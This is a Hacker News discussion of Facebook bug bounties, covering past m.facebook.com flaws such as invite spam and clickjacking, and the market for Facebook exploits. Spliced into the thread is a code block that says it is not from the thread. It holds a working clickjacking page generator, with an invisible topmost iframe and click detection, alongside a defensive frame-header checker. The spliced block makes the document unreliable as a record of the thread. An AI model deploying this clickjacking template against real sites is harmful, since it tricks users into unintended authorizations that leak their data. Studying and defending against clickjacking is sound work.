
Facebook Bug Bounties – Unofficial Treasure Map - phwd
https://www.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001
======
downandout
He forgot to mention m.facebook.com. There have been many issues over the
years with the mobile site that didn't exist on the main site. Examples:

1) You could invite _anyone_ to a Facebook event via their Facebook ID by
simply doing an HTTP POST of Facebook IDs to the event invitation script on
this domain, but not on the main site. For some reason, on the mobile site
they didn't implement the check to see if you were actually friends with the
invitee. Since FB sends an email to each invitee, this was an enormous
spamming loophole for quite a while.

2) For a long time, there was no frame-breaking script on m.facebook.com. You
could clickjack essentially anything on Facebook this way. Years ago I did a
proof-of-concept on this where I clickjacked a platform app authorization,
which let me receive the name, email, and other profile info of any user that
did nothing more than click the X button on an annoying overlay I put on the
screen.

~~~
update
> 2) For a long time, there was no frame-breaking script on m.facebook.com.
> You could clickjack essentially anything on Facebook this way. Years ago I
> did a proof-of-concept on this where I clickjacked a platform app
> authorization, which let me receive the name, email, and other profile info
> of any user that did nothing more than click the X button on an annoying
> overlay I put on the screen.

Do you still have a copy of this? I'd like to see it

~~~
downandout
Today it wouldn't work because they now have frame-breaking on m.facebook.com.
But if you'd like to see the general template, you can email me at the email in
my HN profile.

Basically, you position the iframe element over something that will be clicked
(such as an advertisement X button), set its z-index so that it is the topmost
element, and set its opacity to 0. You can even test to see when the click has
occurred by testing for when a certain element on your page has lost the
focus.
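The template described above, as an added example that is not code from this thread or from Facebook: `buildClickjackPage` emits the attacker page (transparent iframe at the topmost z-index over a decoy "X", with a blur handler that notices when the click lands in the frame), and `framingAllowed` shows the other side, evaluating whether a response's `X-Frame-Options` / CSP `frame-ancestors` headers would let a given parent origin frame it in a modern browser. The target URL, button coordinates and origins are hypothetical.

```javascript
// Added example (not from the HN thread, not Facebook's code). Target URL,
// coordinates and origins are hypothetical.

// Attacker page: an invisible iframe (opacity 0, topmost z-index) positioned so
// that the framed page's real button sits exactly under the decoy "X". The
// blur handler detects the click: the top document loses focus the moment the
// user clicks into a cross-origin frame, and activeElement becomes the IFRAME.
function buildClickjackPage({ targetUrl, buttonX, buttonY, decoyLeft = 40, decoyTop = 40 }) {
  const frameLeft = decoyLeft - buttonX; // shift the frame so (buttonX, buttonY)
  const frameTop = decoyTop - buttonY;   // lands under the decoy
  return `<!doctype html>
<html><body>
<div id="decoy" style="position:absolute;left:${decoyLeft}px;top:${decoyTop}px;
  width:24px;height:24px;background:#ccc;text-align:center;z-index:1">X</div>
<iframe src="${targetUrl}" scrolling="no"
  style="position:absolute;left:${frameLeft}px;top:${frameTop}px;width:1200px;
  height:900px;border:0;opacity:0;z-index:2147483647"></iframe>
<script>
window.addEventListener('blur', function () {
  if (document.activeElement && document.activeElement.tagName === 'IFRAME') {
    document.getElementById('decoy').textContent = 'clicked';
  }
});
</script>
</body></html>`;
}

// Does one CSP frame-ancestors source expression match the parent origin?
// Handles 'none', 'self', '*', scheme-only sources (https:) and host sources
// with an optional leading wildcard label and optional port.
function matchSource(src, parentOrigin, targetOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return parentOrigin === targetOrigin;
  if (s === '*') return true;
  const parent = new URL(parentOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return parent.protocol === s;
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme + ':' !== parent.protocol) return false;
  if (wildcard ? !parent.hostname.endsWith('.' + host) : parent.hostname !== host) return false;
  if (port && port !== '*') {
    const parentPort = parent.port || (parent.protocol === 'https:' ? '443' : '80');
    if (port !== parentPort) return false;
  }
  return true;
}

// Would a page served with these response headers be frameable from
// parentOrigin? Header names are matched case-insensitively.
function framingAllowed(headers, parentOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
    if (directive) {
      // CSP3: when frame-ancestors is present it is enforced and X-Frame-Options is ignored.
      const sources = directive.split(/\s+/).slice(1);
      if (sources.length === 0) return false; // empty source list matches nothing
      return sources.some(src => matchSource(src, parentOrigin, targetOrigin));
    }
  }

  const xfo = h['x-frame-options'];
  if (!xfo) return true; // nothing stops framing: the old m.facebook.com situation
  const v = xfo.trim().toUpperCase();
  if (v === 'DENY') return false;
  if (v === 'SAMEORIGIN') return parentOrigin === targetOrigin;
  // ALLOW-FROM is obsolete (never in Chromium/Safari, dropped by Firefox) and any
  // other unrecognised value is ignored by browsers, i.e. no protection at all.
  return true;
}

console.log(framingAllowed({}, 'https://evil.example', 'https://m.facebook.com'));                         // true
console.log(framingAllowed({ 'X-Frame-Options': 'DENY' }, 'https://evil.example', 'https://m.facebook.com')); // false
```

The `opacity:0` frame still receives pointer events, which is the whole trick; a frame-breaking script or, better, `X-Frame-Options: DENY` / `frame-ancestors 'none'` on the framed response is what closes it. Note that `framingAllowed` checks a single parent origin, while browsers evaluate every ancestor in the frame chain, so run it against each ancestor when auditing nested embeds.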

~~~
update
> Today it wouldn't work because they now have frame-breaking

Yeah. I just want to see what the original vulnerability looked like.

I bug hunt.

Thanks for the offer to email you, but I'm transitioning away from email for
security reasons.

------
tetrep
Nice. Although I'm still on the fence about bug bounties at their current
price, as I can't help but see this as potentially manipulative: like
hackathons where a company owns what you make, this guided hacking seems to be
taking advantage of people's passions in order to underpay them for work.

But, I can't really say it's underpaid, as I have no idea what the black
market for exploits is like, so maybe they are fairly paid.

~~~
dsacco
_> > But, I can't really say it's underpaid, as I have no idea what the black
market for exploits is like, so maybe they are fairly paid._

There is no black market for isolated vulnerabilities in a single website.

[https://news.ycombinator.com/item?id=11249173](https://news.ycombinator.com/item?id=11249173)

~~~
ryanlol
That's not exactly true.

Plenty of profit to be made from hijacking facebook accounts, traffic, etc.

~~~
dsacco
I find this difficult to believe. The demand for a vulnerability is directly
proportional to its half-life. Facebook accounts are not like desktop
computers that can be harvested for a botnet.

I could see e.g. an XSS worm being useful for spreading an advertisement from
status to status, but there are two issues with that hypothesis: 1) Facebook
is centralized, so the flaw would have maybe 24 - 48 hours of utility and 2)
it's not even necessary to use a vulnerability to spread bullshit on Facebook
newsfeeds, so why pay for it?

The alternative claim is that someone would pay a lot of money for a security
vulnerability compromising a high value account belonging to a celebrity,
journalist, politician, etc. I still find this difficult to believe, because
there doesn't appear to be a historical precedent for it. Most such attacks
focus on brute-forcing a password or other authentication mechanism.

~~~
ryanlol
>I could see a e.g. XSS worm being useful for spreading an advertisement from
status to status, but there are two issues with that hypothesis: 1) Facebook
is centralized, so the flaw would have maybe 24 - 48 hours of utility and 2)
it's not even necessary to use a vulnerability to spread bullshit on Facebook
newsfeeds, so why pay for it?

Someone paid 100k to put an exploit pack on redtube for a couple of hours; I'm
sure they'd pay much more for an XSS worm allowing them to do the same on
Facebook. The average value per install in western countries with
cryptolockers and FakeAV is really high.

>The alternative claim is that someone would pay a lot of money for a security
vulnerability compromising a high value account belonging to a celebrity,
journalist, politician, etc. I still find this difficult to believe, because
there doesn't appear to be a historical precedent for it. Most such attacks
focus on brute-forcing a password or other authentication mechanism.

I don't know, I used to regularly get requests from entertainment industry
businesses asking me to compromise competitors' Facebook accounts for obscene
amounts of money. Same goes for jealous ex-boyfriends, even though the sums
offered by them only tended to be a couple of grand.

While certainly true for plenty of other sites, the claim that there's no
market for FB bugs simply has zero basis in reality.

~~~
dsacco
You're actually in the industry, as I am, so I'm willing to suspend more
disbelief to verify what you're saying. You probably wouldn't be willing to
show evidence of these claims here on HN, but would you be willing to do so
privately? That might actually be sufficient to change my stance on Facebook
vulnerability value.

------
Lukas1994
"Facebook’s internal network where employees turn those gears so you can
scroll past that “10 Things You Love About Potatoes” BuzzFeed article one more
time."

------
spejson
So I assume they won't give a bounty if somebody finds a bug like the
possibility of calling their testing tool through a chat message?

~~~
eugeneionesco
Just report it. What are you losing if you do?

~~~
sochihi
time.

